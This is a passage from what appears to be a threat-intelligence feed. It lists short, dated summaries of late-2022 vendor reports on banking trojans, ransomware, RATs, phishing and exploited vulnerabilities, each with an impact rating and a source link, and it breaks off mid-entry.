Palo Alto analysts summarized techniques used by notorious banking Trojan families to evade detection, steal sensitive data and manipulate data. They also describe how those techniques can be blocked. These families include Zeus, Kronos, Trickbot, IcedID, Emotet and Dridex.
Source: https://unit42.paloaltonetworks.com/banking-trojan-techniques/
2022-11-03
The_Fox_Hack_malicious_functions
LOW
+
Intel Source:
Wordfence
Intel Name:
The_Fox_Hack_malicious_functions
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
The Wordfence threat analysts recently discovered the latest version of a Command and Control (C2) script, which is referred to as F-Automatical within the script’s code and was commonly known as FoxAuto in older versions. This version of the automatic C2 script is developed and distributed by a threat group called Anonymous Fox. The script allows for anything from simple information-stealing attacks up to full site takeover, and more.
Source: https://www.wordfence.com/blog/2022/10/what-does-the-fox-hack-breaking-down-the-anonymous-fox-f-automatical-script/
2022-11-03
Surtr_Ransomware_Distributing_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Surtr_Ransomware_Distributing_in_Korea
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
Researchers from ASEC have discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[DycripterSupp@mailfence.com].[].Surtr” file extension to the original file extension name.
Source: https://asec.ahnlab.com/en/41092/
2022-11-03
A_Guloader_variant_techniques
LOW
+
Intel Source:
PaloAlto
Intel Name:
A_Guloader_variant_techniques
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
Unit 42 researchers observed a new Guloader variant that contains a shellcode payload protected by anti-analysis techniques. Their purpose is to slow human analysts and sandboxes processing this sample.
Source: https://unit42.paloaltonetworks.com/guloader-variant-anti-analysis/
2022-11-02
Transformation_of_DarkVNC_from_VNC
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Transformation_of_DarkVNC_from_VNC
Date of Scan:
2022-11-02
Impact:
LOW
Summary:
A team of researchers from SANS have analyzed Virtual Network Computing (VNC), which is a method for controlling a computer remotely. In addition, VNC is a cross-platform screen-sharing system that allows full keyboard and visual control of a remote computer as if you were physically present.
Source: https://isc.sans.edu/diary/rss/29210
2022-11-02
Vulnerable_Docker_and_Kubernetes_Infrastructure_targeted_by_a_Kiss-a-Dog_Cryptojacking_Campaign
LOW
+
Intel Source:
Crowdstrike
Intel Name:
Vulnerable_Docker_and_Kubernetes_Infrastructure_targeted_by_a_Kiss-a-Dog_Cryptojacking_Campaign
Date of Scan:
2022-11-02
Impact:
LOW
Summary:
The CrowdStrike team have identified a new cryptojacking campaign called "Kiss-a-dog" that targets vulnerable Docker and Kubernetes infrastructures. The campaign uses an obscure domain from the payload, container escape attempts, and anonymized dog mining pools to target Docker and Kubernetes infrastructures.
Source: https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/
2022-11-02
ShadowPad_malware_analyses
LOW
+
Intel Source:
VMware
Intel Name:
ShadowPad_malware_analyses
Date of Scan:
2022-11-02
Impact:
LOW
Summary:
VMware researchers have discovered active ShadowPad C2s on the Internet by analyzing the command and control (C2) protocol.
Source: https://blogs.vmware.com/security/2022/10/threat-analysis-active-c2-discovery-using-protocol-emulation-part3-shadowpad.html
2022-11-02
Follina_Vulnerability_triggering_Qbot_infection_chain_compromising_Domain
LOW
+
Intel Source:
DFIRReport
Intel Name:
Follina_Vulnerability_triggering_Qbot_infection_chain_compromising_Domain
Date of Scan:
2022-11-02
Impact:
LOW
Summary:
The DFIR Report researchers discovered an intrusion using the Follina Vulnerability for Initial Access that caused Qbot infection, compromised the entire domain, launched several payloads, and evaded detection.
Source: https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
2022-11-01
A_payload_for_NetSupport_RAT_from_the_sczriptzzbn_inject
LOW
+
Intel Source:
ISC.SANS
Intel Name:
A_payload_for_NetSupport_RAT_from_the_sczriptzzbn_inject
Date of Scan:
2022-11-01
Impact:
LOW
Summary:
This month, researchers from SANS have seen a payload for NetSupport RAT from the sczriptzzbn inject. This injected script causes a fake browser update page to appear in the victim's browser.
Source: https://isc.sans.edu/diary/rss/29170
2022-11-01
The_remote_desktop_services_targeted_by_Venus_ransomware
LOW
+
Intel Source:
MalwareBytes
Intel Name:
The_remote_desktop_services_targeted_by_Venus_ransomware
Date of Scan:
2022-11-01
Impact:
LOW
Summary:
Malwarebytes researchers shared that the threat actors behind the relatively new Venus ransomware are hacking into publicly exposed Remote Desktop services to encrypt Windows devices.
Source: https://www.malwarebytes.com/blog/news/2022/10/venus-ransomware-targets-remote-desktop-services
2022-11-01
An_increase_in_threats_packaged_in_password_protected_archives
LOW
+
Intel Source:
Trustwave
Intel Name:
An_increase_in_threats_packaged_in_password_protected_archives
Date of Scan:
2022-11-01
Impact:
LOW
Summary:
Trustwave lab discovered a rise in threats packaged in password-protected archives, with about 96% of these being spammed by the Emotet botnet. The team also noticed an interesting attachment in this spam campaign. Disguised as an invoice, the attachment, in either ZIP or ISO format, contained a nested self-extracting (SFX) archive.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/archive-sidestepping-self-unlocking-password-protected-rar/
2022-10-31
Qakbot_evolves_intrusion_by_leveraging_valid_code_signing
LOW
+
Intel Source:
TrendMicro
Intel Name:
Qakbot_evolves_intrusion_by_leveraging_valid_code_signing
Date of Scan:
2022-10-31
Impact:
LOW
Summary:
Researchers from TrendMicro extensively researched Qakbot evolving into more intrusive malware leveraging valid code signing through excel macros and .dll files. Qakbot has been seen enumerating and dumping certificates and private keys since July.
Source: https://www.trendmicro.com/en_us/research/22/j/where-is-the-origin-qakbot-uses-valid-code-signing-.html
2022-10-31
The_Growth_of_LODEINFO_backdoor_shellcode
LOW
+
Intel Source:
Securelist
Intel Name:
The_Growth_of_LODEINFO_backdoor_shellcode
Date of Scan:
2022-10-31
Impact:
LOW
Summary:
Securelist researchers have identified that LODEINFO shellcode was regularly updated for use with each infection vector. The developer of LODEINFO v0.5.6 has implemented three new backdoor commands that enhance evasion techniques for certain security products.
Source: https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/
2022-10-31
The_Raspberry_Robin_worm_recent_activity
LOW
+
Intel Source:
Microsoft
Intel Name:
The_Raspberry_Robin_worm_recent_activity
Date of Scan:
2022-10-31
Impact:
LOW
Summary:
Researchers from Microsoft have noted recent activity for the Raspberry Robin worm that links it to other malware families and alternate infection methods beyond its original USB drive spread. These infections lead to follow-on hands-on-keyboard attacks and human-operated ransomware activity. Microsoft's monitoring of Raspberry Robin activity also shows it is a very active operation: Microsoft Defender for Endpoint data indicates that nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days.
Source: https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
2022-10-31
AgentTesla_Being_Distributed_via_VBS
LOW
+
Intel Source:
ASEC
Intel Name:
AgentTesla_Being_Distributed_via_VBS
Date of Scan:
2022-10-31
Impact:
LOW
Summary:
The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file contains multiple code blocks that have been obfuscated multiple times. AgentTesla was found being distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing.
Source: https://asec.ahnlab.com/en/40890/
2022-10-31
A_rise_of_BlackCat_ransomware
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
A_rise_of_BlackCat_ransomware
Date of Scan:
2022-10-31
Impact:
MEDIUM
Summary:
The BlackCat ransomware has recently been very successful in attacks on high-profile companies, and it uses triple extortion, exposing exfiltrated data. In addition, ransomware actors that use triple extortion threaten to launch distributed denial-of-service (DDoS) attacks on their victims’ infrastructure to coerce them into paying the ransom.
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackcat
2022-10-31
Lazarus_Attack_Group_Disabling_Anti-Malware_Programs_With_the_BYOVD_Technique
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Lazarus_Attack_Group_Disabling_Anti-Malware_Programs_With_the_BYOVD_Technique
Date of Scan:
2022-10-31
Impact:
MEDIUM
Summary:
ASEC researchers have identified malware infections by the Lazarus attack group that disable anti-malware programs with the BYOVD technique.
Source: https://asec.ahnlab.com/en/40830/
2022-10-28
Warzone_RAT_Delivering_via_Fake_Hungarian_Government_Email
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Warzone_RAT_Delivering_via_Fake_Hungarian_Government_Email
Date of Scan:
2022-10-28
Impact:
MEDIUM
Summary:
Researchers from FortiGuard have discovered an email pretending to come from the Hungarian government. It includes an attachment that is a zipped executable that, upon execution, extracts the Warzone RAT to memory and runs it.
Source: https://www.fortinet.com/blog/threat-research/fake-hungarian-government-email-drops-warzone-rat?&web_view=true
2022-10-28
The_update_of_Brute_Ratel_decryption
LOW
+
Intel Source:
Medium
Intel Name:
The_update_of_Brute_Ratel_decryption
Date of Scan:
2022-10-28
Impact:
LOW
Summary:
The developer released his notes with the addition of a change to a dynamic key instead of the hardcoded key everyone refers to. The hardcoded key is still used and exists for decrypting some of the strings on board.
Source: https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb
2022-10-27
Qakbot_Malware_Spreading_Rapidly_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Qakbot_Malware_Spreading_Rapidly_in_Korea
Date of Scan:
2022-10-27
Impact:
LOW
Summary:
ASEC researchers have identified that the Qakbot malware is being distributed to Korean users. It uses ISO files, similar to the previous version, but a process to bypass behavior detection was added.
Source: https://asec.ahnlab.com/en/40682/
2022-10-27
CoinMiner_Leveraging_Vulnerable_Apache_Tomcat_Web_Server
LOW
+
Intel Source:
ASEC
Intel Name:
CoinMiner_Leveraging_Vulnerable_Apache_Tomcat_Web_Server
Date of Scan:
2022-10-27
Impact:
LOW
Summary:
Researchers from ASEC have identified the attacks that are targeting vulnerable Apache Tomcat web servers.
Source: https://asec.ahnlab.com/en/40673/
2022-10-27
FormBook_InfoStealer_Being_Distributing_as_DotNet
LOW
+
Intel Source:
ASEC
Intel Name:
FormBook_InfoStealer_Being_Distributing_as_DotNet
Date of Scan:
2022-10-27
Impact:
LOW
Summary:
ASEC researchers have identified FormBook malware that is downloaded to the system and executed while the user was using a web browser. It is an info-stealer that aims to steal the user’s web browser login information, keyboard input, clipboard, and screenshots.
Source: https://asec.ahnlab.com/en/40663/
2022-10-27
Fodcha_Botnet_is_Back_With_New_Version
LOW
+
Intel Source:
360Netlab
Intel Name:
Fodcha_Botnet_is_Back_With_New_Version
Date of Scan:
2022-10-27
Impact:
LOW
Summary:
Researchers from 360Netlab have observed that the Fodcha botnet was updated with a new version in which the operator redesigned the communication protocol and started to use the xxtea and chacha20 algorithms to encrypt sensitive resources and network communication, to avoid detection at the file and traffic level.
Source: https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/
2022-10-27
C2_Communications_Through_outlook
LOW
+
Intel Source:
ISC.SANS
Intel Name:
C2_Communications_Through_outlook
Date of Scan:
2022-10-27
Impact:
LOW
Summary:
Researchers from SANS have identified a malicious Python script that exchanges information with its C2 server through emails.
Source: https://isc.sans.edu/diary/C2+Communications+Through+outlookcom/29180/
2022-10-26
Deep_Analysis_of_Attack_Techniques_and_Cases_Using_RDP
LOW
+
Intel Source:
ASEC
Intel Name:
Deep_Analysis_of_Attack_Techniques_and_Cases_Using_RDP
Date of Scan:
2022-10-26
Impact:
LOW
Summary:
Researchers from ASEC have analyzed RDP (Remote Desktop Protocol) attack techniques and cases. RDP is commonly used in most attacks because it is useful for initial compromise or lateral movement, in comparison to remote control tools that require additional installation processes.
Source: https://asec.ahnlab.com/en/40394/
2022-10-26
LV_Ransomware_Leveraging_ProxyShell_to_Attack
LOW
+
Intel Source:
TrendMicro
Intel Name:
LV_Ransomware_Leveraging_ProxyShell_to_Attack
Date of Scan:
2022-10-26
Impact:
LOW
Summary:
Researchers from Trend Micro have identified ransomware as a service (RaaS) named LV Ransomware which is exploiting ProxyShell in an attack on a Jordan-based company.
Source: https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
2022-10-26
Scammers_Impersonating_Multiple_Brands_for_Phishing_Attack
LOW
+
Intel Source:
Checkpoint
Intel Name:
Scammers_Impersonating_Multiple_Brands_for_Phishing_Attack
Date of Scan:
2022-10-26
Impact:
LOW
Summary:
Researchers from Checkpoint have analyzed the phishing campaigns and found top brands which are most frequently imitated by criminals in their attempts to steal individuals' personal information or payment credentials during July, August, and September.
Source: https://blog.checkpoint.com/2022/10/24/online-shoppers-beware-scammers-most-likely-to-impersonate-dhl/
2022-10-26
Evolution_of_Magniber_Ransomware
LOW
+
Intel Source:
ASEC
Intel Name:
Evolution_of_Magniber_Ransomware
Date of Scan:
2022-10-26
Impact:
LOW
Summary:
Researchers from ASEC have analyzed the Magniber ransomware files distributed in each time period. In the month of September alone, there have been format changes up to four times (cpl -> jse -> js -> wsf -> msi). Frequent changes were also made to the method of injection, UAC bypassing and deactivation of the Windows 10 recovery environment, for the purpose of bypassing detection.
Source: https://asec.ahnlab.com/en/40422/
2022-10-26
A_distribution_of_Amadey_Bot_malware
LOW
+
Intel Source:
ASEC
Intel Name:
A_distribution_of_Amadey_Bot_malware
Date of Scan:
2022-10-26
Impact:
LOW
Summary:
The Korea Internet & Security Agency shared a notice, “Advising Caution on Cyber Attacks Exploiting the Kakao Service Malfunction Issue”, with details about malware that pretends to be a KakaoTalk installation file (KakaoTalkUpdate.zip etc.) and is being distributed by email. The ASEC analysis team obtained the relevant samples and discovered that the file has the same filename and icon as the actual messenger program, which prompts ordinary users to launch it.
Source: https://asec.ahnlab.com/en/40483/
2022-10-26
Malicious_Extension_Dormant_Colors
LOW
+
Intel Source:
Guardio
Intel Name:
Malicious_Extension_Dormant_Colors
Date of Scan:
2022-10-26
Impact:
LOW
Summary:
Researchers from Guardio Security have identified the Dormant Colors malicious extension campaign, with millions of active installations worldwide. At least 30 variants of this extension are part of the campaign, for both Chrome and Edge, available freely in the respective stores.
Source: https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849
2022-10-25
Web_Skimmers_Still_Active
LOW
+
Intel Source:
PaloAlto
Intel Name:
Web_Skimmers_Still_Active
Date of Scan:
2022-10-25
Impact:
LOW
Summary:
PaloAlto researchers have analyzed the latest trends of web threats such as host and landing URLs, including where they are hosted, what categories they belong to, and which malware families pose the most threats.
Source: https://unit42.paloaltonetworks.com/web-threat-trends-web-skimmer/
2022-10-25
US_Government_warns_of_Daixin_Team_Targeting_Health_sector_with_Ransomware
MEDIUM
+
Intel Source:
CISA
Intel Name:
US_Government_warns_of_Daixin_Team_Targeting_Health_sector_with_Ransomware
Date of Scan:
2022-10-25
Impact:
MEDIUM
Summary:
The Daixin Team is a ransomware and data extortion group that has targeted the HPH sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-294a
2022-10-25
Analysis_of_Malicious_RTF_Files
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Analysis_of_Malicious_RTF_Files
Date of Scan:
2022-10-25
Impact:
LOW
Summary:
Researchers from SANS have analyzed malicious RTF files.
Source: https://isc.sans.edu/diary/rtfdumps+Find+Option/29174/
2022-10-25
Cuba_Ransomware_Targeting_Ukrainian_Government_Agencies
LOW
+
Intel Source:
CERT-UA
Intel Name:
Cuba_Ransomware_Targeting_Ukrainian_Government_Agencies
Date of Scan:
2022-10-25
Impact:
LOW
Summary:
CERT-UA researchers have issued an alert about potential Cuba Ransomware attacks against critical networks in the country. They observed a new wave of phishing emails that impersonated the Press Service of the General Staff of the Armed Forces of Ukraine, urging recipients to click on an embedded link.
Source: https://cert.gov.ua/article/2394117 https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries
2022-10-25
SideWinder_APT_Using_New_WarHawk_Backdoor
LOW
+
Intel Source:
Zscaler
Intel Name:
SideWinder_APT_Using_New_WarHawk_Backdoor
Date of Scan:
2022-10-25
Impact:
LOW
Summary:
Researchers from Zscaler have identified that SideWinder APT uses WarHawk malware to target entities in Pakistan.
Source: https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0
2022-10-24
Infostealer_Distributing_Via_Free_and_Cracked_Software
LOW
+
Intel Source:
Cyble
Intel Name:
Infostealer_Distributing_Via_Free_and_Cracked_Software
Date of Scan:
2022-10-24
Impact:
LOW
Summary:
Researchers from Cyble have identified the new Temp stealer spreading via free and cracked software.
Source: https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/
2022-10-24
Various_Remote_Control_Tools_attacks
LOW
+
Intel Source:
ASEC
Intel Name:
Various_Remote_Control_Tools_attacks
Date of Scan:
2022-10-24
Impact:
LOW
Summary:
Researchers from ASEC discovered multiple attack campaigns abusing various remote control tools to steal information, install backdoors and deploy malware.
Source: https://asec.ahnlab.com/en/40263/
2022-10-21
The_multiple_malware_attacks_on_VMware_Vulnerability
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
The_multiple_malware_attacks_on_VMware_Vulnerability
Date of Scan:
2022-10-21
Impact:
MEDIUM
Summary:
Researchers from Fortinet discovered multiple malware campaigns leveraging CVE-2022-22954 to deploy Mirai, RAR1ransom, GuardMiner.
Source: https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability
2022-10-21
Hackers_Exploiting_Text4Shell_Vulnerability
HIGH
+
Intel Source:
Wordfence
Intel Name:
Hackers_Exploiting_Text4Shell_Vulnerability
Date of Scan:
2022-10-21
Impact:
HIGH
Summary:
Researchers from Wordfence have started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell, has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library.
Source: https://www.wordfence.com/blog/2022/10/threat-advisory-monitoring-cve-2022-42889-text4shell-exploit-attempts/
2022-10-21
Zero_Day_Vulnerabilities_in_Microsoft_Exchange_Server
MEDIUM
+
Intel Source:
Wordfence
Intel Name:
Zero_Day_Vulnerabilities_in_Microsoft_Exchange_Server
Date of Scan:
2022-10-21
Impact:
MEDIUM
Summary:
Wordfence researchers have observed exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082. A total of 1,658,281 exploit attempts were observed across their network of 4 million protected websites due to these vulnerabilities.
Source: https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/
2022-10-20
Black_Basta_and_the_Unnoticed_Delivery
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Black_Basta_and_the_Unnoticed_Delivery
Date of Scan:
2022-10-20
Impact:
MEDIUM
Summary:
Researchers from Checkpoint observed, in a recent Black Basta incident spotted by its Incident Response Team, that the operators behind this ransomware also have an impressive organizational structure.
Source: https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/
2022-10-20
A_New_Variant_of_URSNIF_Malware
LOW
+
Intel Source:
Mandiant
Intel Name:
A_New_Variant_of_URSNIF_Malware
Date of Scan:
2022-10-20
Impact:
LOW
Summary:
Researchers from Mandiant have observed URSNIF malware shifting its focus to Ransomware and Data Theft from Banking fraud.
Source: https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud
2022-10-20
WatchDog_Hackers_Possibly_Impersonating_TeamTNT
LOW
+
Intel Source:
TrendMicro
Intel Name:
WatchDog_Hackers_Possibly_Impersonating_TeamTNT
Date of Scan:
2022-10-20
Impact:
LOW
Summary:
Researchers at TrendMicro have found that the attack patterns are similar to the arsenal used by TeamTNT, but that it is likely a different cryptocurrency mining group, known as WatchDog, is deploying the code.
Source: https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html
2022-10-19
New_PowerShell_Backdoor_Fully_Undetectable
MEDIUM
+
Intel Source:
SafeBreach
Intel Name:
New_PowerShell_Backdoor_Fully_Undetectable
Date of Scan:
2022-10-19
Impact:
MEDIUM
Summary:
Using a novel method of disguising itself as part of the Windows update process, researchers from SafeBreach have detected a new fully undetectable (FUD) PowerShell backdoor.
Source: https://www.safebreach.com/resources/blog/safebreach-labs-researchers-uncover-new-fully-undetectable-powershell-backdoor/
2022-10-19
LAZARUS_attacks_using_spear_phishing_emails
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
LAZARUS_attacks_using_spear_phishing_emails
Date of Scan:
2022-10-19
Impact:
LOW
Summary:
The Lazarus campaign targeted an aerospace company employee in the Netherlands and a political journalist in Belgium. The campaign started with spear phishing emails. These came in the form of fake Amazon emails. The main goal of the attackers was to steal data.
Source: https://www.welivesecurity.com/deutsch/2022/10/18/lazarus-greift-die-niederlande-und-belgien-an/
2022-10-18
Diving_Deep_into_New_64_Bit_Emotet_Modules
LOW
+
Intel Source:
Quick Heal
Intel Name:
Diving_Deep_into_New_64_Bit_Emotet_Modules
Date of Scan:
2022-10-18
Impact:
LOW
Summary:
Researchers from QuickHeal have analyzed the new 64 bit Emotet modules and their differences from the previous cosmetic versions.
Source: https://blogs.quickheal.com/a-deep-dive-into-new-64-bit-emotet-modules/
2022-10-18
Potential_C2_Seeder_Queries_18102022
MEDIUM
+
Intel Source:
STR
Intel Name:
Potential_C2_Seeder_Queries_18102022
Date of Scan:
2022-10-18
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: https://github.com/str-int-repo/str-seeder-behavior-queries
2022-10-18
A_Latest_Edition_of_The_New_Royal_Ransomware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
A_Latest_Edition_of_The_New_Royal_Ransomware
Date of Scan:
2022-10-18
Impact:
MEDIUM
Summary:
FortiGuard Labs obtained data on a new variant that is gaining interest in the OSINT community. Royal is a reasonably new operation, having been around since at least the start of 2022. The target of this malware is Microsoft Windows platforms and Windows users. The aim is to gain access to a victim’s environment, encrypt their data, and extort a ransom to return access to any files touched.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware
2022-10-18
CuckooBees_Campaign_Targeting_Organizations_in_Hong_Kong
LOW
+
Intel Source:
Symantec
Intel Name:
CuckooBees_Campaign_Targeting_Organizations_in_Hong_Kong
Date of Scan:
2022-10-18
Impact:
LOW
Summary:
According to Symantec researchers, CuckooBees is continuing to target Hong Kong-based organizations. As part of this ongoing campaign, Spyder Loader (Trojan.Spyload) malware was installed on the networks of victims.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/spyder-loader-cuckoobees-hong-kong
2022-10-18
Python_Obfuscation_for_Dummies
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_Obfuscation_for_Dummies
Date of Scan:
2022-10-18
Impact:
LOW
Summary:
SANS researchers analyzed several malicious Python scripts with the same appearance and end strings. Due to the obfuscation technique, the researchers were unable to figure out what the script is used for without executing it in a sandbox.
Source: https://isc.sans.edu/diary/rss/29160
2022-10-17
Diving_Deep_into_BlueSky_Ransomware
LOW
+
Intel Source:
Cloudsek
Intel Name:
Diving_Deep_into_BlueSky_Ransomware
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
CloudSEK researchers have done a deep analysis of BlueSky Ransomware that covers the technical aspects: Procedure for privilege escalation, Persistence, Encryption mechanism, and Evasion techniques.
Source: https://cloudsek.com/technical-analysis-of-bluesky-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=technical-analysis-of-bluesky-ransomware
2022-10-17
A_new_adversary_simulation_tool_Brute_Ratel_C4_(BRC4)
LOW
+
Intel Source:
Splunk
Intel Name:
A_new_adversary_simulation_tool_Brute_Ratel_C4_(BRC4)
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
The Splunk Threat Research Team (STRT) shared their research on the capture of Brute Ratel Badgers (agents) to create a Yara rule and help identify more on VirusTotal. The Brute Ratel tool is growing in popularity among red teamers and, most recently, adversaries. In addition, the researchers reversed a sample to understand its functions and analyzed it to help defenders identify behaviors related to Brute Ratel.
Source: https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html
2022-10-17
The_Connection_Between_REvil_and_Ransom_Cartel_Ransomware
LOW
+
Intel Source:
Palo Alto
Intel Name:
The_Connection_Between_REvil_and_Ransom_Cartel_Ransomware
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
Researchers from Palo Alto have done a deep analysis of Ransom Cartel ransomware, as well as their assessment of the possible connections between REvil and Ransom Cartel ransomware.
Source: https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/?web_view=true
2022-10-17
LockBit_3.0_is_in_the_spotlight_again
MEDIUM
+
Intel Source:
VMware
Intel Name:
LockBit_3.0_is_in_the_spotlight_again
Date of Scan:
2022-10-17
Impact:
MEDIUM
Summary:
VMware researchers observed that LockBit continues its rise to the top of the ransomware ecosystem as the leading ransomware strain. It was announced that the builder for the ransomware was leaked by @ali_qushji and is available for download from GitHub. This leaked source allows for complete and unhindered analysis, but it also means that many new groups are emerging, using the same or modified versions of LockBit 3.0 originating from this builder.
Source: https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html
2022-10-17
SocGholish_Drive_by_Compromise
LOW
+
Intel Source:
AT&T
Intel Name:
SocGholish_Drive_by_Compromise
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
AT&T researchers have analyzed an alert related to SocGholish, which delivers fake software updates.
Source: https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-feeling-so-foolish-socgholish-drive-by-compromise
2022-10-17
COVID_Phishing_Campaign
LOW
+
Intel Source:
ISC.SANS
Intel Name:
COVID_Phishing_Campaign
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
Researchers from SANS have analyzed phishing emails asking all suppliers to declare their COVID vaccination status, although the date in the email is almost a year old.
Source: https://isc.sans.edu/diary/rss/29150
2022-10-17
A_new_Powershell_script_drops_a_malware
LOW
+
Intel Source:
ISC.SANS
Intel Name:
A_new_Powershell_script_drops_a_malware
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
Researchers from SANS hunted down a malicious PowerShell script that drops malware on the victim's computer. It is not a new one; it is called "autopowershell.ps1". The malware tries to keep its interactions with the file system to a minimum, but to achieve persistence it must write something to disk, which is most often done through registry keys.
Source: https://isc.sans.edu/diary/Fileless+Powershell+Dropper/29156/
2022-10-17
A_rise_of_threats_from_newly_observed_domains
LOW
+
Intel Source:
Palo Alto
Intel Name:
A_rise_of_threats_from_newly_observed_domains
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
Last year, Palo Alto Networks built a proactive detector that recognizes malicious domains and identifies them before they begin their malicious activity. The detector extracts newly observed domains (NODs) from passive DNS and proactively detects potential cybercriminal activity among them. The system also scans newly registered domains (NRDs) and detects their potential network abuse.
Source: https://unit42.paloaltonetworks.com/malicious-newly-observed-domains/
2022-10-17
Prestige_Ransomware_Targeting_Organizations_in_Ukraine_and_Poland
LOW
+
Intel Source:
Microsoft
Intel Name:
Prestige_Ransomware_Targeting_Organizations_in_Ukraine_and_Poland
Date of Scan:
2022-10-17
Impact:
LOW
Summary:
Researchers from Microsoft have identified new Prestige ransomware that is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland.
Source: https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
2022-10-14
BianLian_Ransomware_encrypts_with_an_immediate_speed
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
BianLian_Ransomware_encrypts_with_an_immediate_speed
Date of Scan:
2022-10-14
Impact:
MEDIUM
Summary:
The researchers from Cyble observed that BianLian ransomware raises the severity level by encrypting files with exceptional speed. The threat actors created the new BianLian ransomware version in the Go programming language (aka Golang) for a variety of reasons, particularly its robust support for concurrency, which lets various malicious functions run independently of each other and speeds up the attack.
Source: https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye
2022-10-14
A_spreading_of_RedLine_Stealer
MEDIUM
+
Intel Source:
Cyble
Intel Name:
A_spreading_of_RedLine_Stealer
Date of Scan:
2022-10-14
Impact:
MEDIUM
Summary:
The Cyble Research team uncovered a phishing site that impersonates the genuine “Convertio” online tool website, which converts files into different file formats, including documents, images, spreadsheets, eBooks, archives, presentations, audio, video, etc. The phishing website is well-designed and appears similar to the legitimate Convertio website.
Source: https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/
2022-10-14
Ransom_Cartel_ransomware_performance_overlaps_with_REvil_ransomware
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Ransom_Cartel_ransomware_performance_overlaps_with_REvil_ransomware
Date of Scan:
2022-10-14
Impact:
MEDIUM
Summary:
Palo Alto shared their analysis of Ransom Cartel ransomware. Unit 42 has observed Ransom Cartel encrypting both Windows and Linux VMware ESXi servers in attacks on corporate networks. Ransom Cartel uses double extortion, and some of the same TTPs were observed during its ransomware attacks; this ransomware also uses a less common tool, DonPAPI.
Source: https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/
2022-10-14
Ducktail_infostealer_came_back_again
LOW
+
Intel Source:
Zscaler
Intel Name:
Ducktail_infostealer_came_back_again
Date of Scan:
2022-10-14
Impact:
LOW
Summary:
The Zscaler ThreatLabz research team has come across a new campaign of the Ducktail infostealer with a new PHP version that is being aggressively distributed by posing as a free/cracked application installer for a variety of applications, including games, Microsoft Office applications, Telegram, and others.
Source: https://www.zscaler.com/blogs/security-research/new-php-variant-ducktail-infostealer-targeting-facebook-business-accounts
2022-10-14
AgentTesla_Malware_Distributing_via_WSHRAT_Malware
LOW
+
Intel Source:
Uptycs
Intel Name:
